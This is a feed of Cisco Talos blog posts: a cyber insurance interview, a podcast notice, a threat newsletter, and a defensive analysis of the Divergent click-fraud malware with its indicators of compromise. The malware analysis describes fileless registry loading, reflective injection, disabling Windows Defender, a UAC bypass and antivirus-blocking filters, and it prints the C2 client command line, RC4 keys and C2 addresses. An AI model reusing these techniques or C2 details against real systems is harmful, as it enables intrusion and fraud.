46873290f58c25845b21ce7e560eae1b1d89000e887c2ff2976d931672390dd8
f31b5e14314388903a32eaa68357b8a5d07cbe6731b0bd97d2ee33ac67ea8817
f1c05ff306e941322a38fffb21dfdb5f81c42a00a118217b9d4e9807743d7275
1848f51d946fa8b348db8ef945a1ebff33ff76803ad26dfd175d9ea2aa56c7d0
ed150d9f6e12b6d669bcede3b7dc2026b7161f875edf26c93296e8c6e99152d5
2682328bde4c91637e88201eda5f5c400a3b3c0bdb87438d35660494feff55cf
e82a08f1514ccf38b3ae6b79e67d7605cb20b8377206fbdc44ddadfb06ae4d0d



185[.]43[.]108[.]134
162[.]220[.]55[.]249

Spreadme[.]international

"You rock" installer snippet:



An in-depth look at cyber insurance: We sat down with risk expert, Cisco's Leslie Lamb

$
0
0
Y2K is known for being one of the most widespread times of panic in IT. It was generally thought that on Dec. 31, 1999, computers across the globe would shut down when they would fail to properly process that it would become the year 2000 the next day.

It made headlines across the globe, sent everyone with a computer into a panic and even led to the creation of several U.S. government task forces to prepare for the problem.

But what you may not know is that Y2K spawned the birth of cyber security insurance.

In the buildup of panic, companies became worried that they would lose all their information stored on computers or would lose all ability to operate come Jan. 1, 2000. It was around this time that companies and organizations started to consider mitigating the risk regarding computers and digital storage.

Leslie Lamb was actually one of the first people to even negotiate for a security insurance policy on Cisco’s behalf. Today, the popularity of cyber insurance has exploded as government agencies, small cities, companies and non-profits worry about the rise in ransomware attacks.

Recent studies suggest having a cyber insurance policy could actually be more attractive to attackers, but companies like to have the policies to cover them if they lose substantial revenue, data or operating time as the result of a cyber attack. Many security experts consider it to be one of the tools that should be considered to mitigate an organization’s risk.

So what, exactly, goes into these policies? And how have they changed over time? To get a better idea of how cyber insurance works, and what, exactly, it covers, we sat down with Lamb, Cisco’s director of global risk and resiliency management. Below, we have edited our Q&A for brevity and clarity.

Why do you think cyber insurance has become such a popular trend recently?

Well, cyber insurance is not actually new. That is a misconception that a lot of people hold.

It’s been around for at least 10-15 years. It has just recently taken off.

Over the past five years, it has grown exponentially because of the high profile nature of some cyber incidents. People are aware of what’s going on … no one is immune to having a cyber incident. It’s becoming one of the largest areas for companies to focus on. I’ve been paying attention to cyber for a long time. People thought there’d be major impacts, but there haven’t been……until about 6 or 7 years ago, when we started to see large companies, government entities and even our infrastructure attacked and at risk. Now, people are really starting to look at it.

How have these policies changed since Y2K, then?

They’ve changed dramatically over the past five years.

That whole space has completely blossomed. I would say 6 - 7 years ago … there were a lot of gaps in the coverage.   For example, it was very difficult to find Business Interruption coverage, which would cover costs for loss of revenue. Companies were submitting claims to their insurance carriers and were finding that they were not covered. Insurance companies started to realize there were gaps in coverage, and they started to make these policies much broader and much more meaningful to their customers’ specific risks.

Most cyber policies have deductibles; both monetary and time bound deductibles or waiting periods. Most people are familiar with monetary deductibles, but may not be familiar with time bound deductibles.  An example of a time bound or waiting period would be when a company has a network outage, they may have to wait for 24 or 48 hours before their coverage would kick in.  The larger the company or exposure, typically the larger the monetary and/or longer the time bound deductibles might be. 

Are there any aspects of these policies that you feel people wouldn’t normally think about?
A few examples of coverage that are currently found in the market place and that some people may not know about is coverage for physical damage to hardware or business interruption to help pay for the loss of revenue while the impacted operation is down.

What are some things that stand out to you when you consider what goes into buying Cisco’s cyber insurance policies?

I purchased the first cyber insurance policy that Cisco had, and I purchased it ahead of the curve or before many companies were even considering the purchase.

Generally, we start 120 days out [from when the policy expires]. We essentially do a roadshow for the insurers and present to them what we do as a company. We bring in [Cisco’s CISO] and other internal experts to showcase our mitigation strategies, how we would manage any issue and we discuss our overall governance and internal policies. 

We also talk about all of the different partnerships across the enterprise that help mitigate the risk.  This is about education and awareness. This isn’t about just IT, it’s about forming internal partnerships to manage the risk. There’s legal, there’s HR, there’s risk management and others all at the table.

What are some of the things companies can do to help mitigate risk ahead of time to temper the cost of their policies? 

Making sure their network is safe, providing education and awareness to employees ... having a good business resiliency program in place, doing tabletop exercises to ensure everyone knows their role and everyone knows what to do or not do if they have cyber insurance. Many policies have certain requirements in place, so if you want coverage, you should definitely read the policy ahead of time and know what’s included, what’s not included and what the insurer requires. Many insurers have a panel of experts included in the policy that insured entity can access. People should know about these experts ahead of time and how they might use them.

We don’t live in a world anymore where it’s just four walls and a router. Everything is interconnected.

How can insurance policies address that?

That’s a really complex question, but it depends. … Let’s just say for example [a contract manufacturer], because of the way they put together our gear, causes a cyber problem for one of our customers. We would have a contract that requires the contracted manufacturer to have “network security liability” to cover the costs.

Our philosophy is … that if Cisco caused it, we’re going to pay for it. Whether we pay for it financially or our insurance policies, it’s our responsibility to pay for it. But if a third party causes it, we need them to pay for it, which is why we get involved in requiring our third party vendors to have certain types of insurance.

Beers with Talos Ep. #62: Fifty shades of shady

$
0
0


Beers with Talos (BWT) Podcast episode No. 62 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded Sept. 13, 2019 

In one of our "rantier" episodes, the BWT crew dives into the ongoing insidiousness that is cryptomining with Watchbog, and then we turn our attention to some idiot that thinks charging people $50 to bypass MFA on their own machines is a good idea, because nothing bad can happen there, right? RIGHT?! Finally, we take a look at some recent breaches and the trend of attempting to downplay the severity of a breach because the data ex-fil wasn’t “vital or important.” Again, what can go wrong with that line of thinking? This is fine. Everything is just fine. Security is solved, we can go home now.

The timeline:

  • 01:15 – Roundtable: BWT is infamous, a flying blunderbuss, Mighty Reds, new phones, opening night
  • 15:00 — Pink fluffy ponies dancing on Monero
  • 29:00 — Duo is your friend...bypassing MFA is not
  • 36:00 — Dangers of denying breach severity
  • 49:15 — Parting shots and closing thoughts

Some other links:

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Threat Source newsletter (Sept. 26)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

An attacker known as “Tortoiseshell” is using a phony, malicious website to deliver malware. The site specifically targets U.S. military veterans who may be searching for a job. These types of sites are likely to be shared on social media as the general population hopes to support the veteran population.

Forget about the iPhone 11, impeachment or nation-state cyber attacks. We all know the biggest news of the past week was Area 51. And thankfully, the latest Beers with Talos talks about storming the secret military base. And some other, more cyber security-focused things.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

  • Apple released iOS 13 to all mobile users over the past week. There’s a series of new privacy and security features with the latest version of the operating system, though some of them are not working as expected. 
  • Dozens of YouTubers had their account credentials stolen and accounts taken over as part of a wave of attacks over the weekend. Attackers used malicious websites to trick the content creators into entering their login information. 
  • Microsoft released an out-of-band patch for Internet Explorer this week for a critical vulnerability. An attacker could exploit this bug to completely take over a user’s machine.  
  • The U.S. is reportedly looking into several options to carry out a cyber attack against Iran. The goal is to disrupt their military operations without escalating kinetic warfare. 
  • U.S. security firm CrowdStrike got wrapped up in the impeachment investigation into President Donald Trump. The company assisted the U.S. Democratic National Committee in researching cyber attacks during the 2016 presidential election, and Trump asked the Ukrainian national government to research CrowdStrike, thinking the company was located there. 
  • Security firm Symantec discovered 25 apps on the Google Play store spreading malware. Together, they had been downloaded about 2.1 million times. 
  • Amazon unveiled its idea for a new wireless protocol called “Sidewalk” that is designed to connect users’ Amazon-created IoT home devices. The company says Wi-Fi and Bluetooth do not extend far enough, and 5G is currently too expensive. 
  • The actors behind the Magecart malware are testing new code that could target public WiFi hotspots. Security researchers say Magecart Group 5 is preparing the code to be injected into benign JavaScript files. 
  • A new report from the U.S. Government Accountability Office says that the U.S. Department of Energy has not done enough to protect the American electrical grid from cyber attacks. The report states actors across the globe can force power outages via cyber attacks, though the breadth of those outages is currently unknown.  

Notable recent security issues

Title: New Emotet campaign emerges, but protection stays the same 
Description: At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer draws to a close, Cisco Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. The malware still mainly relies on socially engineered spam emails to spread. Once the attackers have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.
Snort SIDs: 47616, 47617, 48402, 49889, 43890 – 43892, 44559, 44560

Title: Aspose PDF API contains multiple remote code execution vulnerabilities
Description: There are multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API. 
Snort SIDs: 50730, 50731, 50738, 50739

Most prevalent malware files this week

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b 
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: mf2016341595.exe
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
MD5: db69eaaea4d49703f161c81e6fdd036f
Typical Filename: xme32-2141-gcc.exe 
Claimed Product: N/A
Detection Name: W32.46B241E3D3-95.SBX.TG 

Divergent: "Fileless" NodeJS Malware Burrows Deep Within the Host

$
0
0

Update (09/27/2019): Additional information regarding the malware interaction with various online advertisements has been included to highlight the click-fraud related network communications associated with Divergent.

Executive summary


Cisco Talos recently discovered a new malware loader being used to deliver and infect systems with a previously undocumented malware payload called "Divergent." We first dove into this malware after we saw compelling data from Cisco Advanced Malware Protection's (AMP) Exploit Prevention.

This threat uses NodeJS— a program that executes JavaScript outside of a web browser — as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware. The use of NodeJS is not something commonly seen across malware families.

The observed malware campaigns associated with Divergent feature the use of persistence techniques most commonly associated with "fileless" malware, leaving behind few artifacts for researchers to look at. This malware can be leveraged by an attacker to target corporate networks and appears to be primarily designed to conduct click-fraud. It also features several characteristics that have been observed in other click-fraud malware, such as Kovter.

Technical Details


Talos has identified a new moduler malware that is being used to facilitate the installation of a previously undocumented malware family, which we are referring to as Divergent, due to the naming convention used by the malware during variable declaration and the creation of environment variables. While we were unable to determine the delivery mechanism used, we were able to perform analysis of the malware loader as well as the Divergent malware that it is used to install on victim systems. Divergent is a malware family designed to generate revenue for attackers via the use of click-fraud, similar to other click-fraud malware such as Kovter. Technical details associated with both the installation and operation of the Divergent malware are described in the following sections.

Installation


The malware has many similarities with other popular fileless malware families, particularly Kovter. Like Kovter, it relies heavily on the registry for staging and storage of configuration data while avoiding more traditional on-access endpoint scanning of files on disk. It also uses a key in the registry to maintain persistence, and relies on PowerShell to install itself on the infected host.

When first delivered and executed on a victim's machine, the malware is in the portable executable (PE) format. Its first task, however, is to install itself to the system in a less suspicious form, namely as an HTML Application (HTA) that will load the malware from the registry.

Installation begins by creating several registry keys containing the different parts of the loader as well as the data of the malware PE. The malware reads all the information embedded in its data section and creates three new randomly named registry keys, each holding a different stage of the loader code needed to execute the malware PE using reflective injection.

Next, the HTA loader is written to the CSIDL_COMMON_APPDATA folder (typically C:\ProgramData\) and set to execute each time the user logs on by adding an entry to the "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" registry key.

An example of an HTA loader and the accompanying registry entries necessary to execute the malware once installed are:
  • 17T21vYHOb.hta :: e4a49af295d6e61877a458a014fe63b733be942c506496b53070aa3d9ca421d8
  • ZfjrAilGdH.reg :: 5863f35959aa542a27319e098f40166f3ace09d265f4ec6d739318c0b739745e

This registry file contains the following subkeys in the key HKLM\Software\ZfjrAilGdH which are set by the installation process (the key names are randomly generated and will be different for each installation):
  • Lvt4wLGLMZ :: JScript executed by ZfjrAilGdh.hta
  • kCu2DZ9WI0 :: PowerShell used to reflectively inject the malware
  • 4FLJBnefsN :: hex data representing the malware PE

Fileless malware loader

The HTA is heavily obfuscated but when cleaned up, evaluates to an eval of the JScript in the registry key "HKLM\Software\ZfjrAilGdh\Lvt4wLGLMZ" via a "ActiveXObject.WScript.Shell.RegRead" (shown here as pseudo code):
The JScript in the reg key executes the following powershell (shown here deobfuscated):
This code will execute the code found in the registry location HKLM\Software\ZfjrAilGdH\kCu2DZ9WI0 after setting the variable regkeyname to the data found in the registry location HKLM\Software\ZfjrAilGdH\4FLJBnefsN. The registry key 4FLJBnefsN contains the bytes of the malicious portable executable (PE) with a modified DOS header, namely the MZ has been replaced with null bytes.

The code from kCu2DZ9WI0 is a version of PowerShell Empire's reflective PE injection script that will inject the malware:
At this point, the malware executes.

Divergent malware

There are two main parts of this threat: one to receive and execute commands from a C2 server and another to execute external component scripts. The configuration for each part is stored in the registry in JSON format.

The component configuration describes which components should be executed and how. This example configuration will execute three different JScript components:
Each entry is parsed, and each filename and args value is passed along for execution by the malware. Detailed analysis of the call_03 (see Now I See You), all_socks_05 (see Click Fraud), and block_av_01 (see Block AV Component) components can be found below.

The network configuration stores two classes of C2: "accl" is a list of URLs that the malware should attempt to contact for system information delivery and for commands to execute, while "acll" is a list of URLs the malware should attempt to contact for possible updates to either configuration file. The default values from ZfjrAilGdH.reg are:
Notice that "version" is an epoch timestamp, converting to Saturday, March 30, 2019 7:14:29 PM GMT. The earliest reference we found containing several IOCs from this malware sample dates back to February 2019.

Once executed, the malware begins with five anti-analysis checks. If any of these checks fail, a beacon is sent to a static URL containing a direct IP and sleeps indefinitely:
The beacon message indicates which anti-analysis check failed to pass. The malware checks for unwanted processes and loaded modules by hashing process file names and module names respectively, then comparing each hash against two separate pre-computed lists for each. The lists contain hashes for endpoint security software and hypervisor services as running the sample under both scenarios failed these checks. It also checks for a host CPU with at least two cores, the presence of a debugger, and finally compares system uptime intervals to determine if the sample is running within a sandbox or virtual machine.

If the process is running with the appropriate privileges, it uses WMI (Windows Management Instrumentation) to query recognized anti-virus software installed on the host. In particular, it's looking for the antivirus software Windows Defender. If found, it proceeds to disable various components of Windows Defender and Windows Updates.
Once completed, it attempts to bypass UAC using CMSTP, if needed. Additional code is executed to check for any updates to the malware's two configuration files. Empty POST requests are sent to each of the URLs in the first configuration's accl key. These URLs are later contacted with a comprehensive set of sensitive information from the host. Most are non-responsive but still online. Many appear to be, or once were, compromised hosts used for the C2 network.

The set of direct IP URLs found in the first configuration's acll key are contacted until one server responds back with a configuration update. A response containing an RC4 encrypted update to the first of the malware's configurations in the Registry. In this sample, the RC4 key "seiC4aimaish9zah8kah" is static, and decryption results in a lengthier update for the first configuration:
The data is stored in the pre-existing registry subkey to update the value (in this example, HKLM\SOFTWARE\ZfjrAilGdH\194956). As of Sept. 9, 2019, the version timestamp for the latest config pulled was Thursday, Aug. 29, 2019 11:50:19 a.m.

The second configuration is stored in the last remaining value in the ZfjrAilGdH registry subkey (HKLM\SOFTWARE\ZfjrAilGdH\2177774). Default values mentioned near the beginning of this section remained in use during runtime.

The primary flow of the malware code reaches an end but repeats select tasks every 90 minutes. It continues to check for configuration updates, continues to send encrypted sensitive information from the infected host, and continues to process any C2 responses that might contain additional commands to execute. The following commands and parameters are supported by the C2 protocol used by Divergent:
  • killall: Terminate all processes initiated by the malware, delete corresponding files
  • kill: Find process of specified component, terminate process, and delete the file
  • stop: Find process of specified component, terminate process
  • resume: Given pre-existing component, execute file
  • modules: From the same response data, pull additional configuration data from the following keys:
    • name
    • filename
    • args
    • version
    • type
    • download
    • Key
Using this data, the malware sends additional requests to download each specified file. The files are written to disk and executed.

  • update: From the same response data, pull additional configuration data from the following keys:
    • filename
    • download
    • Key
Same as the modules command, the malware sends additional requests to download each specified file. Each file is written to disk and executed. Finally, the task deletes the Registry data stored in its subkey (handles both HKCU and HKLM).

The command update_interval modifies the main thread's sleep counter for the ending loop (the default time is 90 minutes).

Components

Block AV component


The block_av_01 component attempts to block anti-virus software from receiving updates by blocking all outbound TCP connections on port 80 and port 443. With older revisions of this malware package, this functionality was delivered via a JScript file named bav01.js but in newer versions, this has been seen delivered by PowerShell in the fake PNG trpl.png (see Fake PNG PowerShell Delivery).

This installation script starts by creating a new folder (e.g. SystemConfigInfo000) to hold the files necessary for execution. The two files to be installed are WinDivert.dll and either WinDivert32.sys or WinDivert64.sys, depending on the host CPU architecture. These are the legitimate WinDivert binaries and are used by the malware to create its packet filter.

The WinDivert binaries are embedded in bav01.js as comments and written to disk with .b64 extensions. The following is the code to retrieve the embedded resource named arch5 from the script, embedded in a comment block in the format /*[<resource name>[resource data]]*/:
Each WinDivert binary is then decoded from base64 using the Windows Certificate Services utility certutil.exe. For example:
This script is set to execute as a task each time the computer starts. This is accomplished by creating a scheduled task with a random-looking service name that is set to run as the SYSTEM user at the highest run level:
Next, the following PowerShell command is executed (shown here decoded) to execute the base64 encoded PowerShell commands in the environment variable 'nttyuuyt':
The 'nttyuuyt' environment variable was set by bav01.js previously and contains a base64 encoded PE and the PowerShell commands necessary to reflectively inject this executable (truncated for readability):
At this point in the script, installation is complete and the PE-based module to block anti-virus HTTP/HTTPS connections is loaded.

To achieve its anti-virus blocking, the reflectively loaded PE periodically checks the names of all running processes against a predefined list. If any process names appear in the list, the PIDs are added to the filter string passed to WinDivertOpen which will block all traffic to that process on remote ports 80 or 443. An example filter string is:

((processId=620 or processId=736) and (remotePort==80 or remotePort==443))

Example process names that would be blocked include msmpeng.exe (Windows Defender) and svchost.exe.

Click Fraud

The all_socks component is a NodeJS-based Socket.IO client that is commanded to navigate to arbitrary web pages by the attacker ostensibly for monetization and click fraud purposes. With older revisions of this malware package this functionality was delivered via a JScript file named either 04sall.js or 05sall.js, but in newer versions this has been seen delivered by PowerShell in the fake PNG strpk.png (see Fake PNG PowerShell Delivery).

Like the anti-virus blocking component, the click fraud component makes use of the WinDivert library and therefore installs the necessary WinDivert DLL and driver in the same manner as bav01.js, described above. Additionally, the NodeJS executable and a NodeJS Socket.IO client named app.js are part of the installation process for this component. Older versions of this component also installed two executables, divergent.exe and mdivergent.exe, however in later versions, these are executed from memory via reflective PE injection.

The malicious NodeJS application, seen either as app.js or init.js, is a simple Socket.IO client that takes a base64 encoded IP address as its only parameter.

node.exe app.js <base64 encoded IP>

In all samples we have encountered, the IP address has been 176.9.117.194 (encoded as MTc2LjkuMTE3LjE5NA==). Upon execution, the malicious NodeJS app will make a request to the IP passed as a parameter:
The response from this server is the address of the next server which the application will connect to. This new connection uses Socket.IO web sockets to maintain continuous communication between the victim and the server so the server can periodically send commands. The commands sent from this second server contain the host address of an advertisement revenue service and the entire HTTP request that should be made to that server, effectively faking a click on an advertisement link.
To protect themselves from these kinds of fraudulent requests, advertisement monetization services may go to extra lengths to confirm the device making the request is the type of device it claims to be. For example, if the monetization service only expects mobile devices, it may reject requests that have the characteristics of desktop devices. We believe the divergent.exe and mdivergent.exe executables are used by the 04sall.js/05sall.js components to circumvent these kinds of checks (see TCP/IP stack fingerprinting).

The divergent and mdivergent PEs make use of the WinDivert library to intercept and rewrite the first SYN packet of the 3-way TCP handshake for all outgoing connections the infected host attempts to make. The changes made to the SYN packets depend on which executable was used, either divergent.exe or mdivergent.exe; divergent.exe will rewrite the TCP header options to follow the same format as Android devices while mdivergent.exe will rewrite the TCP header options to follow the format as iOS devices. Which version of the divergent executable is used is dependent on the app.js deployment script (either 04sall.js or 05sall.js). These scripts contain code that decides which version should be used depending on a variable named macchance which can be passed to the deployment script as its only parameter. This variable contains the probability that mdivergent.exe will be deployed instead of divergent.exe (the PowerShell parameter, normally base64 encoded, is shown here in its decoded form):
In the code shown above, the variables and and mac correspond to the code necessary to reflectively inject divergent.exe and mdivergent.exe respectively, i.e. and represents Android and mac represents iOS.

For either of these divergent executables to work properly, several changes to the TCP/IP stack on the infected machine must be made; these include setting the TTL to 64, turning on the timestamp TCP header options, and changing the MTU to 1440. Once those changes have been made, the system is forced to reboot with a false message of Critical_Windows_Update:
With these changes made, the divergent executables can perform the necessary modifications to each SYN packet so that they follow the standards of the device the host should be disguised as.

During our analysis of systems actively infected with Divergent, we observed several web requests initiated by the malware attempting to interact with various online advertisements and advertising platforms, indicative of the previously described click-fraud process performed by the malware. Similar to what was observed related to the modification of the TCP configuration, the User-Agent field was modified to make the web requests appear as if they had originated from a mobile device. Web requests were made to various online advertising services and were similar to the following:
We also observed additional web requests similar to the following, which included a standard desktop User-Agent:
Additionally, the malware attempts to interact with “in-app” advertising platforms such as Mobfox.

Now I See You


The component named call_03 by the malware's configuration file, which is delivered by the em_02.js and em_03.js scripts, appears to be a means of installing a remote assist tool on the infected machine that would allow the attacker to view and possibly control the victim's computer.

Like the previous components, the PE associated with em_03.js is executed via reflective PE injection, this time with the environment variable fdghjgfdhj.
The PE to be injected is a DLL which, according to its export table, was originally called now_i_see_you.dll. This DLL has a single exported function named VoidFunc which contains all of its functionality. When VoidFunc is executed, it makes an HTTP GET request to the hxxps://uoibppop[.]tk/. It then takes the response from this server and treats it as a new URL to navigate to. Using COM objects, the DLL launches an instance of Internet Explorer, resizes the window to fit the entire screen and navigates to the URL in the response. At the time of analysis, the server was active but did not respond with any data so we were unable to confirm what was being hosted there.

Additionally, the DLL hides the Windows taskbar so the user is more compelled to comply with any instructions on the page that is presented to them. Next, the malware enters a loop looking for a process containing the string gotoassist (older versions also looked for teamviewer), ostensibly for confirming that the user followed the instructions in Internet Explorer by downloading and running the attacker's malware. Once this process is running, the Windows Taskbar is restored to view. A process list is gathered and sent to the URL hxxps://uoibppop[.]tk/clean; no response is expected from the server. The registry key `HKEY_CURRENT_USER\Software\fbsjbdfhsv` is created and the key value `weqr` is set to 1, indicating that execution was successful, then the process exits. Instead of a URL, the attacker has the option to send the word stop to the victim which will cause the DLL to forcefully reboot the infected machine.

While we do not know what URL the victim is intended to navigate to and therefore which program they are to be tricked into running, based on the process names gotoassist and teamviewer and the original DLL name of now_i_see_you.dll, it is likely that the victim is intended to install one of these remote administration software.

Fake PNG PowerShell delivery


Newer versions of the Divergent malware package no longer deliver and execute components as JScript, instead multi-stage PowerShell scripts are used. The first stage will retrieve the second stage from a static URL. The first-stage PowerShell is heavily obfuscated:
Here is our deobfuscated version:
While the requested resource features the extension normally associated with PNG images, it is actually malicious Powershell that has been encrypted using RC4 with the encryption key "raimeey2nu," which was stored in the previous PowerShell (the particular implementation of RC4 used can be found here).

We have encountered following URLs to retrieve the encrypted PowerShell:
  • hxxp://1292172017[.]rsc.cdn77[.]org/images/trpl.png
  • hxxp://1292172017[.]rsc.cdn77[.]org//imtrack/strkp.png
The first URL delivers the PowerShell version of bav01.js and the second delivers the PowerShell version of 05sall.js.

Taking a deeper look at the PowerShell version of 05sall.js, we see Base64 encoded blobs corresponding to binaries associated with WinDivert. Like its JScript counterpart, the Powershell decodes these blobs and saves them to the filesystem location defined by the environment variable %ALLUSERSPROFILE%.
Shellcode stored within the PowerShell is loaded into a new memory region using the Windows API function VirtualAlloc and then executed to continue the infection process:

Conclusion


The malware loader described is currently under active development. Talos has observed multiple versions of the loader being used to install the Divergent malware. Attackers are attempting to monetize these infections through the use of click fraud. The threat landscape is constantly evolving as attackers test new techniques and methodologies to maximize their revenue generation capabilities. Organizations should be aware of these changes and ensure that their security programs are able to remain effective against these changing tactics, techniques, and procedures. This threat is successfully stopped by the Cisco Advanced Malware Protection (AMP) Exploit Prevention engine, and the resulting event data assisted with our analysis of the threat. Talos will continue to monitor the threat landscape to ensure that customers remain protected.

Coverage

Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)


The following IOCs have been observed as being associated with these malware campaigns.

HTA Hashes:

47b5dac9152220fbbf122eff89ac93d42e9196f5ab665a2a6d99594246ab8a81
062688aec1bdf1208bd72a77696e1fbcd1076f54bd6e59141ed12b6f8e3ba32c

PE32 Hashes:


c7052f4676102bfe39ab19c227832861caa2959933e296ee1806973619948624
781adc919a705ca3e8a82fe1d1eac68f651c50ba402172aea033eaec7879e932
05fbd38ea0b99621d22ce5f057173fdec40f3dccd63f887e1c301766c6597714
2135acda2d2739773fbb827e8d180ac901c040d2f071127bb597a714591672cd
72b6a8bf9598bd445e26a04ab58be62ed3941fb1fe4cf4a094a6272a77b66009
ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
a82dd93585094aeba4363c5aeedd1a85ef72c60a03738b25d452a5d895313875
2f4a9ef2071ee896674e3da1a870d4efab4bb16e2e26ea3d7543d98b614ceab9
77498f0ef4087175aa85ce1388f9d02d14aaf280e52ce7c70f50d3b8405fea9f
b2d29bb9350a0df93d0918c0208af081f917129ee46544508f2e1cf30aa4f4ce
bf2cdd1dc2e20c42d2451c83b8280490879b3515aa6c15ab297419990e017142
ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
a7656ccba0946d25a4efd96f4f4576494d5f1e23e6ad2acc16d2e684656a2d4f
607b2f3fd1e73788a4d6f5a366c708dbb12d174eba9863ade0af89ca40e1fdba

URLs:

hxxps://1292172017[.]rsc[.]cdn77[.]org/images/trpl.png
hxxps://1292172017[.]rsc[.]cdn77[.]org/imtrack/strkp.png

Mutexes:

Global\Divergent
Global\CreatorsPatch
Global\LocalLow7

IP Addresses:


95[.]70[.]244[.]209
13[.]228[.]224[.]121
54[.]241[.]31[.]99
103[.]31[.]4[.]11
103[.]31[.]4[.]54
198[.]41[.]128[.]74
198[.]41[.]128[.]55
131[.]0[.]72[.]36
131[.]0[.]72[.]59
188[.]114[.]96[.]87
188[.]114[.]96[.]116
43[.]250[.]192[.]98
43[.]250[.]192[.]87
217[.]160[.]231[.]125
208[.]91[.]197[.]25
184[.]168[.]221[.]42
103[.]224[.]248[.]219
31[.]31[.]196[.]120
217[.]160[.]223[.]93
103[.]224[.]248[.]219
184[.]168[.]221[.]45
119[.]28[.]87[.]235
23[.]227[.]38[.]32
50[.]63[.]202[.]39
216[.]239[.]34[.]21
83[.]243[.]58[.]172
5[.]9[.]41[.]178
88[.]198[.]26[.]25
62[.]75[.]189[.]110
109[.]239[.]101[.]62
107[.]186[.]67[.]4
184[.]168[.]221[.]63
45[.]55[.]154[.]177
104[.]28[.]2[.]169
202[.]56[.]240[.]5
89[.]163[.]255[.]171
185[.]243[.]114[.]111

Threat Roundup for September 20 to September 27

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 20 and Sept. 27. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

